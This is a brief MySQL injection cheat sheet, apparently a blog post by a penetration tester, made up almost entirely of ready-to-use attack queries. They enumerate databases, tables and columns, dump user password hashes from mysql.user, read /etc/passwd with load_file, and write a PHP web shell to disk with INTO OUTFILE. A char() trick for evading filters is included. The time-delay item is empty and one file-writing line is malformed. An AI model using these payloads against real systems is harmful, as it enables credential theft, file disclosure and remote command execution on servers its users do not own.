1 min read

1. Common information:

SELECT @@version
SELECT user()
SELECT database()

2. Database name:

SELECT schema_name FROM information_schema.schemata

3. Table names:

SELECT table_name FROM information_schema.tables

4. Column names:

SELECT column_name FROM information_schema.columns

5. Dump data

SELECT user,password FROM mysql.user

6. Reading files:

SELECT load_file('/etc/passwd')

7. Writing files:

SELECT '<?php system($_GET['c']);?>' INTO OUTFILE('/tmp/test.php')
SELECT '<?php system($_GET['c']);?>' INTO DUMP FILE('/tmp/test.php')

8. MySQL user:

SELECT user,password FROM mysql.user

9. Time Delay:


10. String tricks:

The same string "root" can be inserted as

char(114, 111, 111, 116)
Sanoj Kumar R

Sanoj Kumar R

Red Teamer | Penetration Tester | OSCP